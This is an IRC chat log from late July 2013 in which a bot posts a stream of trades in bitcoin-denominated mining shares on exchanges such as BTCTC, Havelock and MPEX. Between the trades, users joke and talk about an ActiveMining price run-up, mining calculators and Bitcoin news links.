49 @ 0.000315 = 0.0154 BTC [+] Jul 29 21:13:45 [BTCTC] [TAT.MINIGAME] 4298 @ 0.000315 = 1.3539 BTC [+] Jul 29 21:14:50 [BTCTC] [BASIC-MINING] 1 @ 0.4559 BTC [+] Jul 29 21:14:52 [BTCTC] [BASIC-MINING] 5 @ 0.4559 = 2.2795 BTC [+] Jul 29 21:15:48 [BTCTC] [COGNITIVE] 2 @ 0.54 = 1.08 BTC [+] Jul 29 21:15:51 [BTCTC] [COGNITIVE] 1 @ 0.54 BTC [+] Jul 29 21:15:53 [BTCTC] [COGNITIVE] 4 @ 0.522 = 2.088 BTC [-] Jul 29 21:15:56 [BTCTC] [COGNITIVE] 2 @ 0.52 = 1.04 BTC [-] Jul 29 21:15:58 [BTCTC] [COGNITIVE] 1 @ 0.52 BTC [-] Jul 29 21:16:01 [BTCTC] [COGNITIVE] 5 @ 0.51 = 2.55 BTC [-] Jul 29 21:16:02 [MPEX] [S.MG] 12500 @ 0.0002675 = 3.3438 BTC [+] Jul 29 21:16:20 [BTCTC] [COGNITIVE] 1 @ 0.51 BTC [-] Jul 29 21:18:17 [BTCTC] [BASIC-MINING] 12 @ 0.615 = 7.38 BTC [+] Jul 29 21:18:30 [BTCTC] [BASIC-MINING] 6 @ 0.4558 = 2.7348 BTC [-] Jul 29 21:18:46 [BTCTC] [BTC-BOND] 14 @ 0.009998 = 0.14 BTC [+] Jul 29 21:19:17 [BTCTC] [ACTIVEMINING] 10 @ 0.008749 = 0.0875 BTC [+] Jul 29 21:21:52 [BTCTC] [BASIC-MINING] 1 @ 0.4659 BTC [+] Jul 29 21:22:26 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [+] Jul 29 21:23:18 [BTCTC] [ACTIVEMINING] 10 @ 0.008749 = 0.0875 BTC [+] Jul 29 21:24:26 [BTCTC] [TAT.MINIGAME] 5000 @ 0.0003075 = 1.5375 BTC [-] Jul 29 21:31:27 [BTCTC] [TAT.MINIGAME] 2000 @ 0.000295 = 0.59 BTC [-] Jul 29 21:33:19 [MPEX] [S.MG] 2500 @ 0.0002675 = 0.6688 BTC [+] Jul 29 21:34:28 [BTCTC] [ACTIVEMINING] 125 @ 0.008749 = 1.0936 BTC [+] Jul 29 21:34:39 [BTCTC] [ACTIVEMINING] 1 @ 0.00875 BTC [+] Jul 29 21:35:37 [BTCTC] [DMS.MINING] 4 @ 0.0111 = 0.0444 BTC [+] Jul 29 21:39:40 [HAVELOCK] [AM100] 3 @ 0.041 = 0.123 BTC [-] Jul 29 21:39:51 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 29 21:40:57 [BTCTC] [DMS.MINING] 1 @ 0.0111 BTC [+] Jul 29 21:41:03 [HAVELOCK] [VTX] 2 @ 0.49110001 = 0.9822 BTC [+] Jul 29 21:42:16 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00255 = 0.0153 BTC [+] Jul 29 21:42:24 [HAVELOCK] [VTX] 1 @ 0.49110001 BTC [+] Jul 29 21:42:30 [HAVELOCK] [VTX] 1 @ 0.4911 BTC [-] Jul 29 21:44:21 [HAVELOCK] [AM100] 2 @ 0.04014 = 0.0803 BTC [-] Jul 29 21:45:59 [HAVELOCK] [AM100] 1 @ 0.04013 BTC [-] Jul 29 21:46:02 [HAVELOCK] [AM100] 1 @ 0.04012 BTC [-] Jul 29 21:46:04 [HAVELOCK] [AM100] 1 @ 0.04011 BTC [-] Jul 29 21:46:06 [HAVELOCK] [AM100] 105 @ 0.04011 = 4.2116 BTC [-] Jul 29 21:46:08 [HAVELOCK] [AM100] 13 @ 0.04010001 = 0.5213 BTC [-] Jul 29 21:46:11 [HAVELOCK] [AM100] 2 @ 0.0401 = 0.0802 BTC [-] Jul 29 21:46:13 [HAVELOCK] [AM100] 20 @ 0.04001 = 0.8002 BTC [-] Jul 29 21:46:15 [HAVELOCK] [AM100] 2 @ 0.0400001 = 0.08 BTC [-] Jul 29 21:46:17 [HAVELOCK] [AM100] 1 @ 0.03991 BTC [-] Jul 29 21:46:19 [HAVELOCK] [AM100] 99 @ 0.03990101 = 3.9502 BTC [-] Jul 29 21:46:21 [HAVELOCK] [AM100] 60 @ 0.0399 = 2.394 BTC [-] Jul 29 21:46:22 [HAVELOCK] [AM100] 2 @ 0.0399 = 0.0798 BTC [-] Jul 29 21:46:24 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [-] Jul 29 21:46:26 [HAVELOCK] [AM100] 2 @ 0.0395 = 0.079 BTC [-] Jul 29 21:46:28 [HAVELOCK] [AM100] 2 @ 0.0393 = 0.0786 BTC [-] Jul 29 21:46:30 [HAVELOCK] [AM100] 2 @ 0.0391 = 0.0782 BTC [-] Jul 29 21:46:32 [HAVELOCK] [AM100] 300 @ 0.038999 = 11.6997 BTC [-] Jul 29 21:46:34 [HAVELOCK] [AM100] 1 @ 0.0389111 BTC [-] Jul 29 21:46:36 [HAVELOCK] [AM100] 99 @ 0.03890101 = 3.8512 BTC [-] Jul 29 21:46:38 [HAVELOCK] [AM100] 2 @ 0.0389 = 0.0778 BTC [-] Jul 29 21:46:40 [HAVELOCK] [AM100] 99 @ 0.03790101 = 3.7522 BTC [-] Jul 29 21:46:41 [HAVELOCK] [AM100] 6 @ 0.037 = 0.222 BTC [-] Jul 29 21:46:43 [HAVELOCK] [AM100] 99 @ 0.03690101 = 3.6532 BTC [-] Jul 29 21:46:45 [HAVELOCK] [AM100] 99 @ 0.03590101 = 3.5542 BTC [-] Jul 29 21:46:47 [HAVELOCK] [AM100] 424 @ 0.035 = 14.84 BTC [-] Jul 29 21:46:49 [BTCTC] [ACTIVEMINING] 62 @ 0.008749 = 0.5424 BTC [-] Jul 29 21:47:06 [BTCTC] [ACTIVEMINING] 50 @ 0.008749 = 0.4375 BTC [-] Jul 29 21:47:15 [BTCTC] [ACTIVEMINING] 237 @ 0.008749 = 2.0735 BTC [-] Jul 29 21:47:16 [BTCTC] [BASIC-MINING] 30 @ 0.452 = 13.56 BTC [-] Jul 29 21:47:29 [BTCTC] [ACTIVEMINING] 571 @ 0.008749 = 4.9957 BTC [-] Jul 29 21:47:53 [BTCTC] [ACTIVEMINING] 349 @ 0.008749 = 3.0534 BTC [-] Jul 29 21:47:58 [BTCTC] [ACTIVEMINING] 600 @ 0.008749 = 5.2494 BTC [-] Jul 29 21:48:20 [BTCTC] [ACTIVEMINING] 250 @ 0.008799 = 2.1998 BTC [+] Jul 29 21:48:26 [BTCTC] [ACTIVEMINING] 1000 @ 0.0088 = 8.8 BTC [+] Jul 29 21:48:30 [BTCTC] [ACTIVEMINING] 136 @ 0.008986 = 1.2221 BTC [+] Jul 29 21:48:32 [BTCTC] [ACTIVEMINING] 822 @ 0.008989 = 7.389 BTC [+] Jul 29 21:48:35 [BTCTC] [ACTIVEMINING] 164 @ 0.008996 = 1.4753 BTC [+] Jul 29 21:48:37 [BTCTC] [ACTIVEMINING] 80 @ 0.008996 = 0.7197 BTC [+] Jul 29 21:48:40 [BTCTC] [ACTIVEMINING] 5 @ 0.009 = 0.045 BTC [+] Jul 29 21:48:42 [BTCTC] [ACTIVEMINING] 619 @ 0.009 = 5.571 BTC [+] Jul 29 21:48:58 [BTCTC] [BASIC-MINING] 1 @ 0.4402 BTC [-] Jul 29 21:49:00 [BTCTC] [BASIC-MINING] 3 @ 0.4401 = 1.3203 BTC [-] Jul 29 21:49:10 [BTCTC] [ACTIVEMINING] 25 @ 0.008686 = 0.2172 BTC [-] Jul 29 21:49:46 The amount of transaction fees that btct is making off all this Jul 29 21:49:54 Must be a good time for burnside Jul 29 21:50:55 [BTCTC] [ACTIVEMINING] 25 @ 0.008984 = 0.2246 BTC [+] Jul 29 21:50:57 [BTCTC] [ACTIVEMINING] 171 @ 0.008984 = 1.5363 BTC [+] Jul 29 21:50:59 [BTCTC] [ACTIVEMINING] 12 @ 0.008985 = 0.1078 BTC [+] Jul 29 21:51:38 [BTCTC] [ACTIVEMINING] 10 @ 0.008985 = 0.0899 BTC [+] Jul 29 21:53:18 [HAVELOCK] [AM100] 1 @ 0.0415 BTC [+] Jul 29 21:53:30 [BTCTC] [ASICMINER-PT] 1 @ 4.487 BTC [+] Jul 29 21:53:48 [BTCTC] [ACTIVEMINING] 12 @ 0.008999 = 0.108 BTC [+] Jul 29 21:57:26 [BTCTC] [ACTIVEMINING] 25 @ 0.008761 = 0.219 BTC [-] Jul 29 21:58:55 [BTCTC] [ACTIVEMINING] 175 @ 0.008761 = 1.5332 BTC [-] Jul 29 21:59:15 [BTCTC] [ACTIVEMINING] 25 @ 0.008996 = 0.2249 BTC [+] Jul 29 21:59:31 [BTCTC] [ACTIVEMINING] 150 @ 0.008997 = 1.3496 BTC [+] Jul 29 21:59:34 [BTCTC] [ACTIVEMINING] 113 @ 0.008999 = 1.0169 BTC [+] Jul 29 21:59:34 [BTCTC] [ACTIVEMINING] 381 @ 0.009 = 3.429 BTC [+] Jul 29 21:59:36 [BTCTC] [ACTIVEMINING] 32 @ 0.009 = 0.288 BTC [+] Jul 29 21:59:38 [BTCTC] [ACTIVEMINING] 150 @ 0.009 = 1.35 BTC [+] Jul 29 21:59:40 [BTCTC] [ACTIVEMINING] 746 @ 0.009 = 6.714 BTC [+] Jul 29 21:59:42 [BTCTC] [ACTIVEMINING] 589 @ 0.009 = 5.301 BTC [+] Jul 29 22:00:27 [BTCTC] [ACTIVEMINING] 8 @ 0.009 = 0.072 BTC [+] Jul 29 22:01:38 [BTCTC] [BITVPS] 39 @ 0.001895 = 0.0739 BTC [+] Jul 29 22:02:50 [BTCTC] [ACTIVEMINING] 25 @ 0.009003 = 0.2251 BTC [+] Jul 29 22:02:52 [BTCTC] [ACTIVEMINING] 17 @ 0.009002 = 0.153 BTC [-] Jul 29 22:02:54 [BTCTC] [ACTIVEMINING] 8 @ 0.009002 = 0.072 BTC [-] Jul 29 22:02:56 [BTCTC] [ACTIVEMINING] 294 @ 0.008762 = 2.576 BTC [-] Jul 29 22:03:18 [BTCTC] [ACTIVEMINING] 2 @ 0.008762 = 0.0175 BTC [-] Jul 29 22:03:41 [BTCTC] [TAT.MINIGAME] 4 @ 0.000295 = 0.0012 BTC [-] Jul 29 22:04:33 [BTCTC] [ACTIVEMINING] 2 @ 0.009249 = 0.0185 BTC [+] Jul 29 22:04:35 [BTCTC] [ACTIVEMINING] 398 @ 0.00925 = 3.6815 BTC [+] Jul 29 22:04:48 [HAVELOCK] [SMG] 1 @ 0.00025759 BTC [+] Jul 29 22:04:51 [HAVELOCK] [SMG] 999 @ 0.0002545 = 0.2542 BTC [-] Jul 29 22:05:28 [HAVELOCK] [AM100] 2 @ 0.0413 = 0.0826 BTC [-] Jul 29 22:05:31 [HAVELOCK] [AM100] 4 @ 0.04139 = 0.1656 BTC [+] Jul 29 22:05:57 [BTCTC] [ACTIVEMINING] 25 @ 0.009006 = 0.2252 BTC [-] Jul 29 22:06:22 [BTCTC] [ACTIVEMINING] 5 @ 0.009006 = 0.045 BTC [-] Jul 29 22:06:28 [BTCTC] [ACTIVEMINING] 36 @ 0.009005 = 0.3242 BTC [-] Jul 29 22:06:31 [BTCTC] [ACTIVEMINING] 1 @ 0.009005 BTC [-] Jul 29 22:06:33 [BTCTC] [ACTIVEMINING] 48 @ 0.009003 = 0.4321 BTC [-] Jul 29 22:06:43 [BTCTC] [BASIC-MINING] 1 @ 0.4858 BTC [+] Jul 29 22:07:20 [BTCTC] [RSM] 1 @ 0.01619 BTC [-] Jul 29 22:08:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [-] Jul 29 22:08:49 [BTCTC] [COGNITIVE] 1 @ 0.575 BTC [+] Jul 29 22:09:00 [HAVELOCK] [HIM] 1 @ 0.1889 BTC [-] Jul 29 22:09:02 [HAVELOCK] [HIM] 11 @ 0.189 = 2.079 BTC [+] Jul 29 22:09:29 [BTCTC] [KENILWORTH] 5 @ 0.001712 = 0.0086 BTC [-] Jul 29 22:09:51 [BTCTC] [COGNITIVE] 2 @ 0.5898 = 1.1796 BTC [+] Jul 29 22:11:44 [BTCTC] [B.YABMC] 78 @ 0.002798 = 0.2182 BTC [+] Jul 29 22:11:55 [BTCTC] [B.YABMC] 10 @ 0.002799 = 0.028 BTC [+] Jul 29 22:11:57 [BTCTC] [B.YABMC] 19 @ 0.0028 = 0.0532 BTC [+] Jul 29 22:12:01 [BTCTC] [B.YABMC] 501 @ 0.0028 = 1.4028 BTC [+] Jul 29 22:12:10 [BTCTC] [B.YABMC] 20 @ 0.00283 = 0.0566 BTC [+] Jul 29 22:12:13 [BTCTC] [B.YABMC] 100 @ 0.00283 = 0.283 BTC [+] Jul 29 22:12:20 [BTCTC] [B.YABMC] 100 @ 0.002848 = 0.2848 BTC [+] Jul 29 22:12:23 [BTCTC] [B.YABMC] 76 @ 0.00285 = 0.2166 BTC [+] Jul 29 22:12:26 [BTCTC] [B.YABMC] 100 @ 0.00298 = 0.298 BTC [+] Jul 29 22:12:28 [BTCTC] [B.YABMC] 82 @ 0.00299 = 0.2452 BTC [+] Jul 29 22:13:28 [BTCTC] [COGNITIVE] 3 @ 0.575 = 1.725 BTC [-] Jul 29 22:16:15 [BTCTC] [ACTIVEMINING] 2 @ 0.009 = 0.018 BTC [-] Jul 29 22:16:28 [BTCTC] [ACTIVEMINING] 8 @ 0.009 = 0.072 BTC [-] Jul 29 22:16:30 [BTCTC] [ACTIVEMINING] 25 @ 0.009249 = 0.2312 BTC [+] Jul 29 22:16:32 [BTCTC] [ACTIVEMINING] 48 @ 0.009249 = 0.444 BTC [+] Jul 29 22:16:34 [BTCTC] [ACTIVEMINING] 2 @ 0.00925 = 0.0185 BTC [+] Jul 29 22:17:50 Go go go go gadget money bags Jul 29 22:18:08 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [-] Jul 29 22:18:38 [BTCTC] [ASICMINER-PT] 1 @ 4.425 BTC [-] Jul 29 22:21:57 [HAVELOCK] [AM1] 1 @ 4.3 BTC [-] Jul 29 22:26:37 [BTCTC] [ACTIVEMINING] 1 @ 0.009298 BTC [+] Jul 29 22:27:10 [BTCTC] [ACTIVEMINING] 150 @ 0.00925 = 1.3875 BTC [-] Jul 29 22:27:48 [BTCTC] [ACTIVEMINING] 25 @ 0.009249 = 0.2312 BTC [-] Jul 29 22:27:59 [BTCTC] [ACTIVEMINING] 35 @ 0.00925 = 0.3238 BTC [+] Jul 29 22:28:02 [BTCTC] [ACTIVEMINING] 10 @ 0.009288 = 0.0929 BTC [+] Jul 29 22:28:12 [BTCTC] [ACTIVEMINING] 40 @ 0.009289 = 0.3716 BTC [+] Jul 29 22:28:27 [BTCTC] [ACTIVEMINING] 36 @ 0.009289 = 0.3344 BTC [+] Jul 29 22:28:33 [BTCTC] [ACTIVEMINING] 166 @ 0.009299 = 1.5436 BTC [+] Jul 29 22:28:35 [BTCTC] [ACTIVEMINING] 1000 @ 0.0093 = 9.3 BTC [+] Jul 29 22:28:48 [BTCTC] [ACTIVEMINING] 8 @ 0.0093 = 0.0744 BTC [+] Jul 29 22:29:01 [MPEX] [S.MPOE] 5159 @ 0.00080539 = 4.155 BTC [-] Jul 29 22:29:04 [MPEX] [S.MPOE] 2600 @ 0.00080521 = 2.0935 BTC [-] Jul 29 22:29:05 [MPEX] [S.MPOE] 1896 @ 0.00080477 = 1.5258 BTC [-] Jul 29 22:29:37 [BTCTC] [ACTIVEMINING] 5 @ 0.009499 = 0.0475 BTC [+] Jul 29 22:29:59 [BTCTC] [ACTIVEMINING] 112 @ 0.009499 = 1.0639 BTC [+] Jul 29 22:30:20 [BTCTC] [ACTIVEMINING] 43 @ 0.0095 = 0.4085 BTC [+] Jul 29 22:30:48 gaddamn i have stuff to do don't i Jul 29 22:30:57 [BTCTC] [ACTIVEMINING] 141 @ 0.0095 = 1.3395 BTC [+] Jul 29 22:31:30 [BTCTC] [ACTIVEMINING] 25 @ 0.009301 = 0.2325 BTC [-] Jul 29 22:33:58 [BTCTC] [LTC-ATF.B2] 156 @ 0.0103 = 1.6068 BTC [-] Jul 29 22:33:58 [BTCTC] [BASIC-MINING] 2 @ 0.4859 = 0.9718 BTC [+] Jul 29 22:34:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.043 = 0.258 BTC [-] Jul 29 22:34:39 lol, i can't believe my 0.0095 sell was hit Jul 29 22:35:16 welcome back smickles Jul 29 22:36:45 http://www.reddit.com/r/Bitcoin/comments/1jaiow/mtgox_makes_double_spend_transaction/ Jul 29 22:36:54 mtgox makes double spend transaction : Bitcoin Jul 29 22:37:52 [BTCTC] [COGNITIVE] 6 @ 0.71 = 4.26 BTC [+] Jul 29 22:38:26 [BTCTC] [BASIC-MINING] 1 @ 0.4955 BTC [+] Jul 29 22:38:28 [BTCTC] [BASIC-MINING] 3 @ 0.4955 = 1.4865 BTC [+] Jul 29 22:41:35 [BTCTC] [ACTIVEMINING] 32 @ 0.009499 = 0.304 BTC [+] Jul 29 22:41:39 Excessive wait trying to get lock on ACTIVEMINING. Jul 29 22:41:43 [BTCTC] [ACTIVEMINING] 30 @ 0.0095 = 0.285 BTC [+] Jul 29 22:41:46 [BTCTC] [ACTIVEMINING] 84 @ 0.0095 = 0.798 BTC [+] Jul 29 22:41:52 go go Jul 29 22:41:55 [BTCTC] [ESECURITYSABTC] 10 @ 0.3183 = 3.183 BTC [+] Jul 29 22:42:24 [BTCTC] [ACTIVEMINING] 64 @ 0.009499 = 0.6079 BTC [-] Jul 29 22:42:26 [BTCTC] [ACTIVEMINING] 25 @ 0.009499 = 0.2375 BTC [-] Jul 29 22:42:28 [BTCTC] [ACTIVEMINING] 11 @ 0.0095 = 0.1045 BTC [+] Jul 29 22:42:52 [BTCTC] [ACTIVEMINING] 100 @ 0.0095 = 0.95 BTC [+] Jul 29 22:43:20 [BTCTC] [ACTIVEMINING] 25 @ 0.0095 = 0.2375 BTC [+] Jul 29 22:43:25 gonna be fun seeing that 0.01 battle Jul 29 22:43:29 I'm putting in a wall at .0999 :P Jul 29 22:44:27 [BTCTC] [ACTIVEMINING] 22 @ 0.009499 = 0.209 BTC [-] Jul 29 22:44:31 [BTCTC] [ACTIVEMINING] 14 @ 0.009499 = 0.133 BTC [-] Jul 29 22:44:51 [BTCTC] [ACTIVEMINING] 2 @ 0.009401 = 0.0188 BTC [-] Jul 29 22:44:53 [BTCTC] [ACTIVEMINING] 2 @ 0.0094 = 0.0188 BTC [-] Jul 29 22:44:54 [BTCTC] [ACTIVEMINING] 315 @ 0.0094 = 2.961 BTC [-] Jul 29 22:44:56 [BTCTC] [ACTIVEMINING] 15 @ 0.00936 = 0.1404 BTC [-] Jul 29 22:44:58 [BTCTC] [ACTIVEMINING] 19 @ 0.009352 = 0.1777 BTC [-] Jul 29 22:45:00 [BTCTC] [ACTIVEMINING] 79 @ 0.009301 = 0.7348 BTC [-] Jul 29 22:45:09 [BTCTC] [ACTIVEMINING] 28 @ 0.0093 = 0.2604 BTC [-] Jul 29 22:45:13 [BTCTC] [ACTIVEMINING] 130 @ 0.0093 = 1.209 BTC [-] Jul 29 22:45:19 [BTCTC] [ACTIVEMINING] 112 @ 0.009251 = 1.0361 BTC [-] Jul 29 22:45:22 [BTCTC] [ACTIVEMINING] 225 @ 0.00925 = 2.0813 BTC [-] Jul 29 22:45:24 that wall on 0.01 is huge Jul 29 22:45:29 ThickAsThieves: yo o/ i've been back, but not particularly active :/ Jul 29 22:45:53 boooooo excessive wait Jul 29 22:46:11 Rulother_: try, try again Jul 29 22:46:20 o I'm gonna Jul 29 22:47:06 Dammit, I was hoping to have my refund from BFL before this bubble Jul 29 22:47:24 was there an announcement with ActiveMining and their farm? Jul 29 22:47:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.04299 = 0.4299 BTC [-] Jul 29 22:47:40 I still have no idea why I own AMC Jul 29 22:47:41 They met up and will release details in 2-3 weeks or something like that Jul 29 22:48:02 They said it went "well" Jul 29 22:48:03 naemsi: then you're the typical AMC shareholder ;) Jul 29 22:48:14 pankkake: Must be :) Jul 29 22:48:35 satoshi money was released on bitfunder today Jul 29 22:48:42 *satoshidice Jul 29 22:48:53 Where's the pump action coming from? Reddit has been quiet on AMC for a couple weeks Jul 29 22:48:57 ;;calc 105000 * 0.009 Jul 29 22:48:58 945.0 Jul 29 22:49:09 total market cap of 945 Jul 29 22:49:12 hmm Jul 29 22:49:21 oops Jul 29 22:49:48 ;;calc 25000000 * 0.09 Jul 29 22:49:49 2250000 Jul 29 22:49:53 ;;calc 25000000 * 0.009 Jul 29 22:49:53 225000.0 Jul 29 22:49:58 reddit, quiet? http://www.reddit.com/r/bitcoinstocks Jul 29 22:51:16 and yet I downvote every single one Jul 29 22:51:28 lol Jul 29 22:51:31 :D Jul 29 22:52:16 [BTCTC] [BASIC-MINING] 1 @ 0.4956 BTC [+] Jul 29 22:52:20 [BTCTC] [BASIC-MINING] 1 @ 0.4958 BTC [+] Jul 29 22:52:22 [BTCTC] [BASIC-MINING] 1 @ 0.499 BTC [+] Jul 29 22:52:25 [BTCTC] [BASIC-MINING] 4 @ 0.5 = 2 BTC [+] Jul 29 22:52:28 [BTCTC] [BASIC-MINING] 2 @ 0.51 = 1.02 BTC [+] Jul 29 22:52:31 it's a bit shocking imho.. i never saw so much excitement on reddit about one stock before Jul 29 22:52:32 [BTCTC] [BASIC-MINING] 5 @ 0.51 = 2.55 BTC [+] Jul 29 22:52:35 [BTCTC] [BASIC-MINING] 2 @ 0.512 = 1.024 BTC [+] Jul 29 22:52:38 [BTCTC] [BASIC-MINING] 2 @ 0.513 = 1.026 BTC [+] Jul 29 22:52:40 [BTCTC] [BASIC-MINING] 10 @ 0.5148 = 5.148 BTC [+] Jul 29 22:52:42 [BTCTC] [BASIC-MINING] 10 @ 0.5149 = 5.149 BTC [+] Jul 29 22:52:45 this will end very very bloody.. but not yet :> Jul 29 22:53:00 It's making a lot of people rich Jul 29 22:54:42 true, but there will be some who get hurt nonetheless.. like the 266 "bubble" Jul 29 22:54:48 gonna need a siege ladder for the wall battle Jul 29 22:54:49 YOLO http://i.imgur.com/yZebBvb.jpg Jul 29 22:54:57 but they'll have to get it across the moat first Jul 29 22:55:12 o god why jc Jul 29 22:55:27 .bait Jul 29 22:55:30 http://24.media.tumblr.com/tumblr_m9srqdZ0do1ruz6zso1_1280.jpg Jul 29 22:55:33 [BTCTC] [ACTIVEMINING] 7 @ 0.009499 = 0.0665 BTC [+] Jul 29 22:55:36 YOLO YOLO YOLO Jul 29 22:56:01 yay bimbos Jul 29 22:56:12 .bait Jul 29 22:56:17 http://25.media.tumblr.com/tumblr_ligh4oKmTI1qh262so1_1280.jpg Jul 29 22:56:41 [BTCTC] [ACTIVEMINING] 39 @ 0.009499 = 0.3705 BTC [+] Jul 29 22:56:45 [BTCTC] [ACTIVEMINING] 2 @ 0.0095 = 0.019 BTC [+] Jul 29 22:56:45 http://i.imgur.com/LKUo0psh.jpg Jul 29 22:56:53 [BTCTC] [ACTIVEMINING] 25 @ 0.009001 = 0.225 BTC [-] Jul 29 22:56:55 [BTCTC] [ACTIVEMINING] 235 @ 0.009 = 2.115 BTC [-] Jul 29 22:56:59 dexX7> it's a bit shocking imho.. i never saw so much excitement on reddit about one stock before <<< socking works wonders on the internets. Jul 29 22:56:59 [BTCTC] [ACTIVEMINING] 4 @ 0.0095 = 0.038 BTC [+] Jul 29 22:57:16 it's a bitcoin gem Jul 29 22:57:25 who gets to keep it? Jul 29 22:57:26 pretty much Jul 29 22:57:28 http://i.imgur.com/aftIlxV.jpg Jul 29 22:57:59 Welcome back Jul 29 22:58:19 pay me: http://i.imgur.com/ZoegXNj.png Jul 29 22:58:33 funniest subreddit of my life Jul 29 23:00:29 [BTCTC] [ACTIVEMINING] 7 @ 0.009002 = 0.063 BTC [-] **** BEGIN LOGGING AT Tue Jul 30 03:59:59 2013 Jul 30 04:01:40 [BTCTC] [ACTIVEMINING] 15 @ 0.008998 = 0.135 BTC [+] Jul 30 04:01:42 [BTCTC] [ACTIVEMINING] 40 @ 0.008999 = 0.36 BTC [+] Jul 30 04:03:24 this thead is awesome https://bitcointalk.org/index.php?topic=257913.0 Jul 30 04:03:30 "We've reached out to the Bitcoin foundation for more info on this development and will update with any new information we receive." http://www.theverge.com/2013/7/29/4569126/bitcoin-tries-to-become-legal-currency-in-thailand-gets-outlawed Jul 30 04:03:42 goat better get on his boat Jul 30 04:03:45 who you gonna call? Jul 30 04:04:20 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 30 04:04:25 [BTCTC] [TAT.ASICMINER] 40 @ 0.0423 = 1.692 BTC [+] Jul 30 04:04:32 The United States of America (USA) hate me. My . basically only biological . father cooperates with the Embassy of, and the government of, the Islamic Republic of Iran. Jul 30 04:04:42 only one biological father, poor guy Jul 30 04:05:47 [BTCTC] [ACTIVEMINING] 50 @ 0.008998 = 0.4499 BTC [-] Jul 30 04:05:52 [BTCTC] [ASICMINER-PT] 1 @ 4.394 BTC [+] Jul 30 04:05:57 [BTCTC] [ACTIVEMINING] 60 @ 0.008999 = 0.5399 BTC [+] Jul 30 04:06:31 [BTCTC] [TAT.ASICMINER] 28 @ 0.0423 = 1.1844 BTC [+] Jul 30 04:06:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0423 = 0.423 BTC [+] Jul 30 04:06:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.04221 = 0.1266 BTC [-] Jul 30 04:10:05 Since 2010, London firefighters have treated almost 500 people with rings stuck on their fingers, nine with rings stuck on their penises, and one man with his penis stuck in a toaster. Jul 30 04:10:29 dub is this taaki ? Jul 30 04:10:38 [BTCTC] [ACTIVEMINING] 10 @ 0.008998 = 0.09 BTC [-] Jul 30 04:10:53 you call fire brigade with something stuck on your dick Jul 30 04:10:54 ? Jul 30 04:11:16 mircea_popescu: this guy https://bitcointalk.org/index.php?topic=257913.0 Jul 30 04:11:36 [BTCTC] [ACTIVEMINING] 100 @ 0.008999 = 0.8999 BTC [+] Jul 30 04:11:37 [BTCTC] [ACTIVEMINING] 77 @ 0.008999 = 0.6929 BTC [+] Jul 30 04:11:46 "I need personal bank accounts" / "Open bank accounts for me" Jul 30 04:11:57 ... perhaps the definition of personal is not as well understood as previously thought. Jul 30 04:22:24 [MPEX] [S.MPOE] 10013 @ 0.00080811 = 8.0916 BTC [+] Jul 30 04:22:26 [MPEX] [S.MPOE] 2234 @ 0.00080924 = 1.8078 BTC [+] Jul 30 04:22:38 [BTCTC] [ACTIVEMINING] 150 @ 0.008998 = 1.3497 BTC [-] Jul 30 04:25:24 [HAVELOCK] [SMG] 1443 @ 0.00026998 = 0.3896 BTC [+] Jul 30 04:25:46 ls Jul 30 04:31:09 [BTCTC] [ACTIVEMINING] 3 @ 0.008997 = 0.027 BTC [-] Jul 30 04:32:03 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199 = 0.398 BTC [-] Jul 30 04:51:24 is there a mining calculator out there that factors in diff increases? Jul 30 04:51:50 no Jul 30 04:51:53 maybe you should make one Jul 30 04:52:15 im not good at maff or tings Jul 30 04:52:20 had the same thought Jul 30 04:52:43 lets pay scrat to do it Jul 30 04:53:37 http://mining.thegenesisblock.com ? Jul 30 04:55:22 doesnt have the right tools Jul 30 04:55:54 its pretty good Jul 30 04:56:30 why is it per month? Jul 30 04:56:54 who abducted KALLIE LEEDS?!?!?!? Jul 30 04:58:06 dub: http://btcinvest.net/bitcoin-mining-profit-calculator.php Jul 30 04:58:40 still not the best.. be aware: diff increase / month, not periode Jul 30 05:00:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.04321 = 0.2161 BTC [+] Jul 30 05:01:14 i want one with diff per change and the ability to customize the diff % for each change, then it maps thr diff dates on a calendar Jul 30 05:01:25 how much? Jul 30 05:01:29 i'll program it for you Jul 30 05:01:57 for 3 btc Jul 30 05:02:51 tat's imperium.. passthroughs, charts and mining calculators =D Jul 30 05:04:14 more to come Jul 30 05:04:39 string, will it be legit ? Jul 30 05:05:20 [MPEX] [S.MPOE] 21750 @ 0.00080325 = 17.4707 BTC [-] Jul 30 05:06:25 it can be depends on how much you want to pay Jul 30 05:06:27 [HAVELOCK] [SDSTM] 2 @ 0.0089985 = 0.018 BTC [+] Jul 30 05:06:35 what you want a web app integrated with google calendars? Jul 30 05:07:29 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002875 = 0.2875 BTC [-] Jul 30 05:07:49 so, anyone seen a BFL single sell? Jul 30 05:12:02 [MPEX] [S.MG] 2500 @ 0.000267 = 0.6675 BTC [-] Jul 30 05:17:17 [BTCTC] [ACTIVEMINING] 19 @ 0.00895 = 0.1701 BTC [-] Jul 30 05:22:21 [BTCTC] [ACTIVEMINING] 1 @ 0.00895 BTC [-] Jul 30 05:23:02 [BTCTC] [ACTIVEMINING] 90 @ 0.00895 = 0.8055 BTC [-] Jul 30 05:24:37 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002875 = 0.0575 BTC [-] Jul 30 05:27:54 [BTCTC] [ACTIVEMINING] 22 @ 0.008996 = 0.1979 BTC [+] Jul 30 05:30:59 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002875 BTC [-] Jul 30 05:34:49 [BTCTC] [ACTIVEMINING] 10 @ 0.00896 = 0.0896 BTC [-] Jul 30 05:34:51 [BTCTC] [ACTIVEMINING] 20 @ 0.00895 = 0.179 BTC [-] Jul 30 05:34:52 [BTCTC] [ACTIVEMINING] 79 @ 0.008762 = 0.6922 BTC [-] Jul 30 05:34:54 [BTCTC] [ACTIVEMINING] 100 @ 0.00876 = 0.876 BTC [-] Jul 30 05:34:57 [BTCTC] [ACTIVEMINING] 8 @ 0.008755 = 0.07 BTC [-] Jul 30 05:34:59 